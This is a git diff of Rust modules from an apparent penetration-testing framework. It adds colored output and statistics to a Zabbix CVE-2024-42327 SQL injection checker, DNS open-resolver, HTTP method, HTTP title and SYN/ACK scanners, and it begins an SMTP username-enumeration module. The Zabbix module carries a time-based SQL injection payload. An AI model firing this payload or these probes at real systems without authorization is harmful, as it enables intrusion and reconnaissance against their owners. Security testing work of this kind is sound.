@@ -63,15 +84,20 @@ async fn exploit_zabbix(api_url: &str, username: &str, password: &str, _payload:
|
||||
.await
|
||||
.map_err(|e| anyhow!("Test request error: {}", e))?;
|
||||
|
||||
let elapsed = start.elapsed();
|
||||
let test_response_text = test_response
|
||||
.text()
|
||||
.await
|
||||
.map_err(|e| anyhow!("Failed to read test response: {}", e))?;
|
||||
|
||||
println!("{}", format!("[*] Response received in {:.2}s", elapsed.as_secs_f64()).cyan());
|
||||
|
||||
if test_response_text.contains("\"error\"") {
|
||||
println!("[-] NOT VULNERABLE.");
|
||||
println!("{}", "[-] Target does NOT appear vulnerable (error in response).".red());
|
||||
} else if elapsed.as_secs() >= 5 {
|
||||
println!("{}", "[+] VULNERABLE! Response delayed by SLEEP injection.".green().bold());
|
||||
} else {
|
||||
println!("[!] VULNERABLE.");
|
||||
println!("{}", "[?] Inconclusive - response received but no delay detected.".yellow());
|
||||
}
|
||||
|
||||
Ok(())
|
||||
@@ -79,13 +105,13 @@ async fn exploit_zabbix(api_url: &str, username: &str, password: &str, _payload:
|
||||
|
||||
// Prompt user to choose a payload option
|
||||
async fn get_payload_choice() -> Result<String> {
|
||||
println!("Choose SQL payload option:");
|
||||
println!("1: Load SQL payloads from file");
|
||||
println!("2: Enter custom SQL payload");
|
||||
println!("3: Use default SQL payload");
|
||||
println!("{}", "[*] Choose SQL payload option:".cyan().bold());
|
||||
println!(" {} Load SQL payloads from file", "[1]".green());
|
||||
println!(" {} Enter custom SQL payload", "[2]".green());
|
||||
println!(" {} Use default SQL payload (SLEEP-based)", "[3]".green());
|
||||
|
||||
let mut choice = String::new();
|
||||
print!("Enter your choice (1/2/3): ");
|
||||
print!("{}", "Enter your choice (1/2/3): ".cyan().bold());
|
||||
io::stdout().flush().unwrap();
|
||||
io::stdin()
|
||||
.read_line(&mut choice)
|
||||
@@ -96,16 +122,17 @@ async fn get_payload_choice() -> Result<String> {
|
||||
match choice {
|
||||
"1" => {
|
||||
// Load from a file (e.g., sql_payloads.txt)
|
||||
println!("Loading SQL payloads from file...");
|
||||
println!("{}", "[*] Loading SQL payloads from file...".cyan());
|
||||
let payloads = fs::read_to_string("sql_payloads.txt")
|
||||
.map_err(|e| anyhow!("Error reading payload file: {}", e))?;
|
||||
println!("{}", "[+] Payloads loaded successfully".green());
|
||||
Ok(payloads.trim().to_string())
|
||||
}
|
||||
"2" => {
|
||||
// Allow user to input a custom payload
|
||||
println!("Enter your custom SQL payload (do not include the SELECT statement, only the payload part): ");
|
||||
let mut custom_payload = String::new();
|
||||
print!("{}", "Enter your custom SQL payload: ".cyan().bold());
|
||||
io::stdout().flush().unwrap();
|
||||
let mut custom_payload = String::new();
|
||||
io::stdin()
|
||||
.read_line(&mut custom_payload)
|
||||
.map_err(|e| anyhow!("Failed to read custom payload: {}", e))?;
|
||||
@@ -114,35 +141,41 @@ async fn get_payload_choice() -> Result<String> {
|
||||
|
||||
// Ensure the custom payload isn't empty
|
||||
if custom_payload.is_empty() {
|
||||
println!("{}", "[-] Custom payload cannot be empty".red());
|
||||
return Err(anyhow!("Custom payload cannot be empty. Please enter a valid payload."));
|
||||
}
|
||||
|
||||
println!("{}", format!("[+] Using custom payload: {}", custom_payload).green());
|
||||
Ok(custom_payload.to_string())
|
||||
}
|
||||
"3" => {
|
||||
// Use a default payload
|
||||
println!("Using default SQL payload...");
|
||||
println!("{}", "[*] Using default SQL payload (SLEEP-based)...".cyan());
|
||||
Ok("readonly AND (SELECT(SLEEP(5)))".to_string())
|
||||
}
|
||||
_ => Err(anyhow!("Invalid choice, please select 1, 2, or 3.")),
|
||||
_ => {
|
||||
println!("{}", "[-] Invalid choice".red());
|
||||
Err(anyhow!("Invalid choice, please select 1, 2, or 3."))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Public dispatch entry point
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("[*] Zabbix 7.0.0 SQL Injection Checker (CVE-2024-42327)");
|
||||
println!("[*] Target API URL: {}", target);
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target API URL: {}", target).yellow());
|
||||
println!();
|
||||
|
||||
let mut username = String::new();
|
||||
let mut password = String::new();
|
||||
|
||||
print!("Username: ");
|
||||
print!("{}", "Username: ".cyan().bold());
|
||||
io::stdout().flush().unwrap();
|
||||
io::stdin()
|
||||
.read_line(&mut username)
|
||||
.map_err(|e| anyhow!("Failed to read username: {}", e))?;
|
||||
|
||||
print!("Password: ");
|
||||
print!("{}", "Password: ".cyan().bold());
|
||||
io::stdout().flush().unwrap();
|
||||
io::stdin()
|
||||
.read_line(&mut password)
|
||||
@@ -151,6 +184,11 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
let username = username.trim();
|
||||
let password = password.trim();
|
||||
|
||||
if username.is_empty() || password.is_empty() {
|
||||
println!("{}", "[-] Username and password are required".red());
|
||||
return Err(anyhow!("Username and password are required"));
|
||||
}
|
||||
|
||||
// Get the payload choice from the user
|
||||
let payload = get_payload_choice().await?;
|
||||
|
||||
|
||||
@@ -22,9 +22,17 @@ struct TargetSpec {
|
||||
port: Option<u16>,
|
||||
}
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔══════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ DNS Recursion & Amplification Scanner ║".cyan());
|
||||
println!("{}", "║ Detects open resolvers that may be abused for DoS attacks ║".cyan());
|
||||
println!("{}", "╚══════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Scan DNS resolvers for open recursion with improved input validation.
|
||||
pub async fn run(initial_target: &str) -> Result<()> {
|
||||
println!("\n=== DNS Recursion & Amplification Scanner ===");
|
||||
display_banner();
|
||||
|
||||
let mut targets = collect_targets(initial_target)?;
|
||||
if targets.is_empty() {
|
||||
@@ -60,6 +68,11 @@ pub async fn run(initial_target: &str) -> Result<()> {
|
||||
|
||||
let mut any_success = false;
|
||||
let mut last_error: Option<anyhow::Error> = None;
|
||||
let mut vulnerable_count = 0usize;
|
||||
let mut tested_count = 0usize;
|
||||
let start_time = std::time::Instant::now();
|
||||
|
||||
println!();
|
||||
|
||||
for spec in targets.drain(..) {
|
||||
let port = spec.port.unwrap_or(default_port);
|
||||
@@ -70,10 +83,12 @@ pub async fn run(initial_target: &str) -> Result<()> {
|
||||
spec.input
|
||||
);
|
||||
|
||||
tested_count += 1;
|
||||
|
||||
match resolve_target(&spec.host, port).await {
|
||||
Ok((socket_addr, resolved_display)) => {
|
||||
println!("[*] Target resolver: {}", resolved_display);
|
||||
match query_target(socket_addr, &resolved_display, &name, record_type).await {
|
||||
println!("{}", format!("[*] Target resolver: {}", resolved_display).cyan());
|
||||
match query_target(socket_addr, &resolved_display, &name, record_type, &mut vulnerable_count).await {
|
||||
Ok(()) => any_success = true,
|
||||
Err(err) => {
|
||||
eprintln!(
|
||||
@@ -94,6 +109,25 @@ pub async fn run(initial_target: &str) -> Result<()> {
|
||||
}
|
||||
}
|
||||
|
||||
let elapsed = start_time.elapsed();
|
||||
|
||||
// Print statistics
|
||||
println!();
|
||||
println!("{}", "=== Scan Statistics ===".bold());
|
||||
println!(" Targets tested: {}", tested_count);
|
||||
println!(" Vulnerable (open): {}", if vulnerable_count > 0 {
|
||||
vulnerable_count.to_string().red().bold().to_string()
|
||||
} else {
|
||||
"0".green().to_string()
|
||||
});
|
||||
println!(" Duration: {:.2}s", elapsed.as_secs_f64());
|
||||
|
||||
if vulnerable_count > 0 {
|
||||
println!();
|
||||
println!("{}", "[!] WARNING: Open recursive DNS resolvers detected!".red().bold());
|
||||
println!("{}", " These can be abused for DNS amplification attacks.".yellow());
|
||||
}
|
||||
|
||||
if any_success {
|
||||
Ok(())
|
||||
} else {
|
||||
@@ -106,6 +140,7 @@ async fn query_target(
|
||||
display_target: &str,
|
||||
name: &Name,
|
||||
record_type: RecordType,
|
||||
vulnerable_count: &mut usize,
|
||||
) -> Result<()> {
|
||||
println!(
|
||||
"[*] Sending {} query (timeout 5s) to {}",
|
||||
@@ -124,12 +159,16 @@ async fn query_target(
|
||||
.with_context(|| format!("DNS query to {} failed", display_target))?;
|
||||
|
||||
let (message, _) = response.into_parts();
|
||||
report_result(&message, display_target, record_type);
|
||||
let is_vulnerable = report_result(&message, display_target, record_type);
|
||||
|
||||
if is_vulnerable {
|
||||
*vulnerable_count += 1;
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn report_result(message: &Message, display_target: &str, record_type: RecordType) {
|
||||
fn report_result(message: &Message, display_target: &str, record_type: RecordType) -> bool {
|
||||
let recursion_available = message.recursion_available();
|
||||
let recursion_desired = message.recursion_desired();
|
||||
let authoritative = message.authoritative();
|
||||
@@ -145,16 +184,16 @@ fn report_result(message: &Message, display_target: &str, record_type: RecordTyp
|
||||
message.answers().len(),
|
||||
message.name_servers().len(),
|
||||
message.additionals().len()
|
||||
)
|
||||
).dimmed()
|
||||
);
|
||||
|
||||
if truncated {
|
||||
println!("[!] Response was truncated (TC flag set).");
|
||||
println!("{}", "[!] Response was truncated (TC flag set).".yellow());
|
||||
}
|
||||
|
||||
println!(
|
||||
"[*] Flags: RD={} RA={} AA={}",
|
||||
recursion_desired, recursion_available, authoritative
|
||||
"{}",
|
||||
format!("[*] Flags: RD={} RA={} AA={}", recursion_desired, recursion_available, authoritative).dimmed()
|
||||
);
|
||||
|
||||
if recursion_available && rcode != ResponseCode::Refused {
|
||||
@@ -167,12 +206,14 @@ fn report_result(message: &Message, display_target: &str, record_type: RecordTyp
|
||||
if authoritative { "(authoritative data returned)" } else { "" }
|
||||
)
|
||||
.green()
|
||||
.bold()
|
||||
);
|
||||
println!(
|
||||
"{}",
|
||||
" This resolver may be abused for reflection/amplification attacks (ANY/DNSSEC)."
|
||||
.yellow()
|
||||
);
|
||||
true
|
||||
} else if recursion_available && rcode == ResponseCode::Refused {
|
||||
println!(
|
||||
"{}",
|
||||
@@ -182,6 +223,7 @@ fn report_result(message: &Message, display_target: &str, record_type: RecordTyp
|
||||
)
|
||||
.yellow()
|
||||
);
|
||||
false
|
||||
} else {
|
||||
println!(
|
||||
"{}",
|
||||
@@ -189,8 +231,9 @@ fn report_result(message: &Message, display_target: &str, record_type: RecordTyp
|
||||
"[-] {} does not appear to allow recursion (RA flag unset or query refused).",
|
||||
display_target
|
||||
)
|
||||
.red()
|
||||
.dimmed()
|
||||
);
|
||||
false
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
@@ -1,10 +1,11 @@
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use chrono::Utc;
|
||||
use colored::*;
|
||||
use reqwest::{Client, Method, StatusCode, Url};
|
||||
use std::collections::HashSet;
|
||||
use std::fs;
|
||||
use std::io::{self, Write};
|
||||
use std::time::Duration;
|
||||
use std::time::{Duration, Instant};
|
||||
|
||||
const METHODS: &[&str] = &[
|
||||
"GET",
|
||||
@@ -95,9 +96,15 @@ pub async fn run(initial_target: &str) -> Result<()> {
|
||||
.context("Failed to build HTTP client")?;
|
||||
|
||||
let mut all_results = Vec::new();
|
||||
let mut total_success = 0usize;
|
||||
let mut total_errors = 0usize;
|
||||
let start_time = Instant::now();
|
||||
|
||||
println!("{}", format!("[*] Scanning {} target(s) with {} methods each...",
|
||||
normalized.len(), METHODS.len()).cyan().bold());
|
||||
|
||||
for target in &normalized {
|
||||
println!("\n=== Target: {} ===", target);
|
||||
println!("\n{}", format!("=== Target: {} ===", target).bold());
|
||||
let mut method_results = Vec::new();
|
||||
|
||||
for &method_name in METHODS {
|
||||
@@ -123,43 +130,41 @@ pub async fn run(initial_target: &str) -> Result<()> {
|
||||
Ok(resp) => {
|
||||
let status = resp.status();
|
||||
let ok = status.is_success();
|
||||
if verbose {
|
||||
println!(
|
||||
" [{}] {} -> {} ({:.2?})",
|
||||
method_name,
|
||||
target,
|
||||
status,
|
||||
elapsed
|
||||
);
|
||||
if ok {
|
||||
total_success += 1;
|
||||
if verbose {
|
||||
println!("{}", format!(" [{}] {} -> {} ({:.2?})", method_name, target, status, elapsed).green());
|
||||
} else {
|
||||
println!("{}", format!(" [{}] {}", method_name, status).green());
|
||||
}
|
||||
} else {
|
||||
println!(" [{}] {}", method_name, status);
|
||||
if verbose {
|
||||
println!("{}", format!(" [{}] {} -> {} ({:.2?})", method_name, target, status, elapsed).yellow());
|
||||
} else {
|
||||
println!("{}", format!(" [{}] {}", method_name, status).yellow());
|
||||
}
|
||||
}
|
||||
method_results.push(MethodResult {
|
||||
method: method_name,
|
||||
status: Some(status),
|
||||
ok,
|
||||
error: None,
|
||||
duration_ms: elapsed.as_millis(),
|
||||
ok,
|
||||
error: None,
|
||||
duration_ms: elapsed.as_millis(),
|
||||
});
|
||||
}
|
||||
Err(err) => {
|
||||
total_errors += 1;
|
||||
if verbose {
|
||||
println!(
|
||||
" [{}] {} -> error: {} ({:.2?})",
|
||||
method_name,
|
||||
target,
|
||||
err,
|
||||
elapsed
|
||||
);
|
||||
println!("{}", format!(" [{}] {} -> error: {} ({:.2?})", method_name, target, err, elapsed).red());
|
||||
} else {
|
||||
println!(" [{}] error: {}", method_name, err);
|
||||
println!("{}", format!(" [{}] error: {}", method_name, err).red());
|
||||
}
|
||||
method_results.push(MethodResult {
|
||||
method: method_name,
|
||||
status: None,
|
||||
ok: false,
|
||||
error: Some(err.to_string()),
|
||||
duration_ms: elapsed.as_millis(),
|
||||
duration_ms: elapsed.as_millis(),
|
||||
});
|
||||
}
|
||||
}
|
||||
@@ -167,10 +172,26 @@ pub async fn run(initial_target: &str) -> Result<()> {
|
||||
|
||||
all_results.push(TargetResult {
|
||||
target: target.clone(),
|
||||
results: method_results,
|
||||
results: method_results,
|
||||
});
|
||||
}
|
||||
|
||||
let total_elapsed = start_time.elapsed();
|
||||
let total_requests = normalized.len() * METHODS.len();
|
||||
|
||||
// Print statistics
|
||||
println!();
|
||||
println!("{}", "=== Scan Statistics ===".bold());
|
||||
println!(" Targets: {}", normalized.len());
|
||||
println!(" Methods tested: {}", METHODS.len());
|
||||
println!(" Total requests: {}", total_requests);
|
||||
println!(" Successful: {}", total_success.to_string().green());
|
||||
println!(" Errors: {}", total_errors.to_string().red());
|
||||
println!(" Duration: {:.2}s", total_elapsed.as_secs_f64());
|
||||
if total_elapsed.as_secs() > 0 {
|
||||
println!(" Rate: {:.1} requests/s", total_requests as f64 / total_elapsed.as_secs_f64());
|
||||
}
|
||||
|
||||
if save_output {
|
||||
let default_name = format!(
|
||||
"http_method_scan_{}.txt",
|
||||
@@ -189,15 +210,11 @@ pub async fn run(initial_target: &str) -> Result<()> {
|
||||
}
|
||||
|
||||
fn banner() {
|
||||
println!(
|
||||
"{}",
|
||||
r#"
|
||||
╔══════════════════════════════════════════════════════╗
|
||||
║ HTTP METHOD CAPABILITY SCANNER ║
|
||||
║ Checks support for common verbs ║
|
||||
╚══════════════════════════════════════════════════════╝
|
||||
"#
|
||||
);
|
||||
println!("{}", "╔══════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ HTTP Method Capability Scanner ║".cyan());
|
||||
println!("{}", "║ Checks support for common HTTP verbs (GET, POST, etc.) ║".cyan());
|
||||
println!("{}", "╚══════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
fn collect_initial_targets(initial_target: &str) -> Vec<String> {
|
||||
|
||||
@@ -1,11 +1,12 @@
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use chrono::Utc;
|
||||
use colored::*;
|
||||
use regex::Regex;
|
||||
use reqwest::{Client, StatusCode, Url};
|
||||
use std::collections::HashSet;
|
||||
use std::fs;
|
||||
use std::io::{self, Write};
|
||||
use std::time::Duration;
|
||||
use std::time::{Duration, Instant};
|
||||
|
||||
pub async fn run(initial_target: &str) -> Result<()> {
|
||||
banner();
|
||||
@@ -68,16 +69,36 @@ pub async fn run(initial_target: &str) -> Result<()> {
|
||||
|
||||
let title_re = Regex::new(r"(?is)<title\b[^>]*>(.*?)</title>")?;
|
||||
let mut all_results = Vec::new();
|
||||
let mut success_count = 0usize;
|
||||
let mut error_count = 0usize;
|
||||
let start_time = Instant::now();
|
||||
let total_targets = normalized.len();
|
||||
|
||||
println!("{}", format!("[*] Scanning {} target(s)...", total_targets).cyan().bold());
|
||||
println!();
|
||||
|
||||
for (idx, url) in normalized.iter().enumerate() {
|
||||
// Progress indicator
|
||||
if (idx + 1) % 10 == 0 || idx + 1 == total_targets {
|
||||
print!("\r{}", format!("[*] Progress: {}/{} ({:.0}%)",
|
||||
idx + 1, total_targets, ((idx + 1) as f64 / total_targets as f64) * 100.0).dimmed());
|
||||
io::stdout().flush().ok();
|
||||
}
|
||||
|
||||
for url in &normalized {
|
||||
match fetch_title(&client, url, &title_re).await {
|
||||
Ok(result) => {
|
||||
if let Some(title) = &result.title {
|
||||
println!("[+] {} -> {}" , url, title);
|
||||
println!("\r{}", format!("[+] {} -> {}", url, title).green());
|
||||
success_count += 1;
|
||||
} else if let Some(status) = result.status {
|
||||
println!("[+] {} -> <no title> (status: {})", url, status);
|
||||
if status.is_success() {
|
||||
println!("\r{}", format!("[+] {} -> <no title> (status: {})", url, status).green());
|
||||
success_count += 1;
|
||||
} else {
|
||||
println!("\r{}", format!("[~] {} -> <no title> (status: {})", url, status).yellow());
|
||||
}
|
||||
} else {
|
||||
println!("[+] {} -> <no title>", url);
|
||||
println!("\r{}", format!("[~] {} -> <no title>", url).yellow());
|
||||
}
|
||||
if verbose {
|
||||
if let Some(status) = result.status {
|
||||
@@ -88,7 +109,8 @@ pub async fn run(initial_target: &str) -> Result<()> {
|
||||
all_results.push(result);
|
||||
}
|
||||
Err(err) => {
|
||||
println!("[-] {} -> error: {}", url, err);
|
||||
println!("\r{}", format!("[-] {} -> error: {}", url, err).red());
|
||||
error_count += 1;
|
||||
all_results.push(TitleResult {
|
||||
url: url.clone(),
|
||||
status: None,
|
||||
@@ -100,6 +122,19 @@ pub async fn run(initial_target: &str) -> Result<()> {
|
||||
}
|
||||
}
|
||||
|
||||
let elapsed = start_time.elapsed();
|
||||
|
||||
// Print statistics
|
||||
println!();
|
||||
println!("{}", "=== Scan Statistics ===".bold());
|
||||
println!(" Total scanned: {}", total_targets);
|
||||
println!(" Successful: {}", success_count.to_string().green());
|
||||
println!(" Errors: {}", error_count.to_string().red());
|
||||
println!(" Duration: {:.2}s", elapsed.as_secs_f64());
|
||||
if elapsed.as_secs() > 0 {
|
||||
println!(" Rate: {:.1} requests/s", total_targets as f64 / elapsed.as_secs_f64());
|
||||
}
|
||||
|
||||
if save_output {
|
||||
let default_name = format!(
|
||||
"http_title_scan_{}.txt",
|
||||
@@ -361,13 +396,9 @@ fn write_report(path: &str, results: &[TitleResult]) -> Result<()> {
|
||||
}
|
||||
|
||||
fn banner() {
|
||||
println!(
|
||||
"{}",
|
||||
r#"
|
||||
╔══════════════════════════════════════════════════╗
|
||||
║ HTTP TITLE SCANNER (RustSploit) ║
|
||||
║ Enumerate page titles over HTTP/HTTPS endpoints ║
|
||||
╚══════════════════════════════════════════════════╝
|
||||
"#
|
||||
);
|
||||
println!("{}", "╔══════════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ HTTP Title Scanner ║".cyan());
|
||||
println!("{}", "║ Enumerate page titles over HTTP/HTTPS endpoints ║".cyan());
|
||||
println!("{}", "╚══════════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
@@ -6,3 +6,5 @@ pub mod http_title_scanner;
|
||||
pub mod ping_sweep;
|
||||
pub mod http_method_scanner;
|
||||
pub mod dns_recursion;
|
||||
pub mod ssh_scanner;
|
||||
pub mod smtp_user_enum;
|
||||
|
||||
@@ -742,6 +742,10 @@ async fn syn_probe_single(ip: &Ipv4Addr, port: u16, timeout: Duration) -> Result
|
||||
let mut buf = [MaybeUninit::<u8>::uninit(); 1500];
|
||||
match sock_clone.recv_from(&mut buf) {
|
||||
Ok((len, addr)) => {
|
||||
// Safe conversion: we know len is valid and within buf bounds
|
||||
if len > buf.len() {
|
||||
return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "Invalid buffer length"));
|
||||
}
|
||||
let slice = unsafe { std::slice::from_raw_parts(buf.as_ptr() as *const u8, len) };
|
||||
let sock_addr = addr.as_socket().ok_or_else(|| std::io::Error::new(std::io::ErrorKind::Other, "convert"))?;
|
||||
Ok(Some((slice.to_vec(), sock_addr)))
|
||||
@@ -917,6 +921,10 @@ async fn ack_probe_single(ip: &Ipv4Addr, port: u16, timeout: Duration) -> Result
|
||||
let mut buf = [MaybeUninit::<u8>::uninit(); 1500];
|
||||
match sock_clone.recv_from(&mut buf) {
|
||||
Ok((len, addr)) => {
|
||||
// Safe conversion: we know len is valid and within buf bounds
|
||||
if len > buf.len() {
|
||||
return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "Invalid buffer length"));
|
||||
}
|
||||
let slice = unsafe { std::slice::from_raw_parts(buf.as_ptr() as *const u8, len) };
|
||||
let sock_addr = addr.as_socket().ok_or_else(|| std::io::Error::new(std::io::ErrorKind::Other, "convert"))?;
|
||||
Ok(Some((slice.to_vec(), sock_addr)))
|
||||
|
||||
@@ -1,15 +1,202 @@
|
||||
use anyhow::{Result, Context};
|
||||
use reqwest;
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use colored::*;
|
||||
use reqwest::Client;
|
||||
use std::fs::File;
|
||||
use std::io::{self, Write};
|
||||
use std::time::{Duration, Instant};
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ HTTP Connectivity Scanner ║".cyan());
|
||||
println!("{}", "║ Checks HTTP/HTTPS reachability and response codes ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// A simple scanner that tries an HTTP GET and prints the response code
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
println!("[*] Running sample_scanner on: {}", target);
|
||||
|
||||
let url = format!("http://{}", target);
|
||||
let resp = reqwest::get(&url)
|
||||
.await
|
||||
.context("Failed to send request")?;
|
||||
|
||||
println!("[*] Status code: {}", resp.status());
|
||||
display_banner();
|
||||
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
|
||||
let timeout_secs = prompt_timeout()?;
|
||||
let check_http = prompt_bool("Check HTTP (port 80)?", true)?;
|
||||
let check_https = prompt_bool("Check HTTPS (port 443)?", true)?;
|
||||
let verbose = prompt_bool("Verbose output?", false)?;
|
||||
let save_results = prompt_bool("Save results to file?", false)?;
|
||||
|
||||
if !check_http && !check_https {
|
||||
return Err(anyhow!("At least one protocol must be selected"));
|
||||
}
|
||||
|
||||
let client = Client::builder()
|
||||
.timeout(Duration::from_secs(timeout_secs))
|
||||
.danger_accept_invalid_certs(true)
|
||||
.build()
|
||||
.context("Failed to build HTTP client")?;
|
||||
|
||||
let mut results = Vec::new();
|
||||
let start = Instant::now();
|
||||
|
||||
println!();
|
||||
println!("{}", "[*] Starting scan...".cyan().bold());
|
||||
|
||||
// Check HTTP
|
||||
if check_http {
|
||||
let url = if target.contains("://") {
|
||||
target.to_string()
|
||||
} else {
|
||||
format!("http://{}", target)
|
||||
};
|
||||
|
||||
if verbose {
|
||||
println!("{}", format!("[*] Checking {}...", url).dimmed());
|
||||
}
|
||||
|
||||
match client.get(&url).send().await {
|
||||
Ok(resp) => {
|
||||
let status = resp.status();
|
||||
let status_str = status.to_string();
|
||||
let content_type = resp.headers()
|
||||
.get("content-type")
|
||||
.map(|v| v.to_str().unwrap_or("unknown"))
|
||||
.unwrap_or("unknown");
|
||||
let server = resp.headers()
|
||||
.get("server")
|
||||
.map(|v| v.to_str().unwrap_or("unknown"))
|
||||
.unwrap_or("unknown");
|
||||
|
||||
if status.is_success() {
|
||||
println!("{}", format!("[+] HTTP {} -> {} (Server: {}, Content-Type: {})",
|
||||
url, status_str, server, content_type).green());
|
||||
} else if status.is_redirection() {
|
||||
let location = resp.headers()
|
||||
.get("location")
|
||||
.map(|v| v.to_str().unwrap_or("unknown"))
|
||||
.unwrap_or("unknown");
|
||||
println!("{}", format!("[~] HTTP {} -> {} (Redirect: {})", url, status_str, location).yellow());
|
||||
} else {
|
||||
println!("{}", format!("[-] HTTP {} -> {}", url, status_str).red());
|
||||
}
|
||||
|
||||
results.push(format!("HTTP {} -> {} (Server: {})", url, status_str, server));
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] HTTP {} -> Error: {}", url, e).red());
|
||||
results.push(format!("HTTP {} -> Error: {}", url, e));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check HTTPS
|
||||
if check_https {
|
||||
let url = if target.contains("://") {
|
||||
target.replace("http://", "https://")
|
||||
} else {
|
||||
format!("https://{}", target)
|
||||
};
|
||||
|
||||
if verbose {
|
||||
println!("{}", format!("[*] Checking {}...", url).dimmed());
|
||||
}
|
||||
|
||||
match client.get(&url).send().await {
|
||||
Ok(resp) => {
|
||||
let status = resp.status();
|
||||
let status_str = status.to_string();
|
||||
let server = resp.headers()
|
||||
.get("server")
|
||||
.map(|v| v.to_str().unwrap_or("unknown"))
|
||||
.unwrap_or("unknown");
|
||||
let content_type = resp.headers()
|
||||
.get("content-type")
|
||||
.map(|v| v.to_str().unwrap_or("unknown"))
|
||||
.unwrap_or("unknown");
|
||||
|
||||
if status.is_success() {
|
||||
println!("{}", format!("[+] HTTPS {} -> {} (Server: {}, Content-Type: {})",
|
||||
url, status_str, server, content_type).green());
|
||||
} else if status.is_redirection() {
|
||||
let location = resp.headers()
|
||||
.get("location")
|
||||
.map(|v| v.to_str().unwrap_or("unknown"))
|
||||
.unwrap_or("unknown");
|
||||
println!("{}", format!("[~] HTTPS {} -> {} (Redirect: {})", url, status_str, location).yellow());
|
||||
} else {
|
||||
println!("{}", format!("[-] HTTPS {} -> {}", url, status_str).red());
|
||||
}
|
||||
|
||||
results.push(format!("HTTPS {} -> {} (Server: {})", url, status_str, server));
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] HTTPS {} -> Error: {}", url, e).red());
|
||||
results.push(format!("HTTPS {} -> Error: {}", url, e));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
let elapsed = start.elapsed();
|
||||
|
||||
// Print summary
|
||||
println!();
|
||||
println!("{}", "=== Scan Summary ===".bold());
|
||||
println!(" Target: {}", target);
|
||||
println!(" Duration: {:.2}s", elapsed.as_secs_f64());
|
||||
println!(" Checks: {}", results.len());
|
||||
|
||||
// Save results
|
||||
if save_results && !results.is_empty() {
|
||||
let filename = prompt_with_default("Output filename", "http_scan_results.txt")?;
|
||||
let mut file = File::create(&filename).context("Failed to create output file")?;
|
||||
writeln!(file, "HTTP Connectivity Scan Results")?;
|
||||
writeln!(file, "Target: {}", target)?;
|
||||
writeln!(file, "Duration: {:.2}s", elapsed.as_secs_f64())?;
|
||||
writeln!(file)?;
|
||||
for result in &results {
|
||||
writeln!(file, "{}", result)?;
|
||||
}
|
||||
println!("{}", format!("[+] Results saved to '{}'", filename).green());
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn prompt_bool(message: &str, default: bool) -> Result<bool> {
|
||||
let hint = if default { "Y/n" } else { "y/N" };
|
||||
print!("{}", format!("{} [{}]: ", message, hint).cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim().to_lowercase();
|
||||
match trimmed.as_str() {
|
||||
"" => Ok(default),
|
||||
"y" | "yes" => Ok(true),
|
||||
"n" | "no" => Ok(false),
|
||||
_ => Ok(default),
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_with_default(message: &str, default: &str) -> Result<String> {
|
||||
print!("{}", format!("{} [{}]: ", message, default).cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(default.to_string())
|
||||
} else {
|
||||
Ok(trimmed.to_string())
|
||||
}
|
||||
}
|
||||
|
||||
fn prompt_timeout() -> Result<u64> {
|
||||
print!("{}", "Timeout in seconds [10]: ".cyan().bold());
|
||||
io::stdout().flush()?;
|
||||
let mut input = String::new();
|
||||
io::stdin().read_line(&mut input)?;
|
||||
let trimmed = input.trim();
|
||||
if trimmed.is_empty() {
|
||||
Ok(10)
|
||||
} else {
|
||||
trimmed.parse().map_err(|_| anyhow!("Invalid timeout"))
|
||||
}
|
||||
}
|
||||
|
||||
@@ -0,0 +1,867 @@
|
||||
//! SMTP Username Enumeration Scanner Module
|
||||
//!
|
||||
//! Enumerates usernames on an SMTP server using the VRFY command.
|
||||
//! Supports wordlist-based enumeration with concurrent scanning.
|
||||
//!
|
||||
//! For authorized penetration testing only.
|
||||
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use colored::*;
|
||||
use regex::Regex;
|
||||
use std::fs::{File, OpenOptions};
|
||||
use std::io::{self, BufRead, BufReader, Write};
|
||||
use std::net::{TcpStream, ToSocketAddrs};
|
||||
use std::path::Path;
|
||||
use std::sync::{Arc, Mutex};
|
||||
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
|
||||
use std::time::{Duration, Instant};
|
||||
use telnet::{Telnet, Event};
|
||||
use threadpool::ThreadPool;
|
||||
use crossbeam_channel::unbounded;
|
||||
|
||||
const PROGRESS_INTERVAL_SECS: u64 = 2;
|
||||
const DEFAULT_SMTP_PORT: u16 = 25;
|
||||
const DEFAULT_THREADS: usize = 10;
|
||||
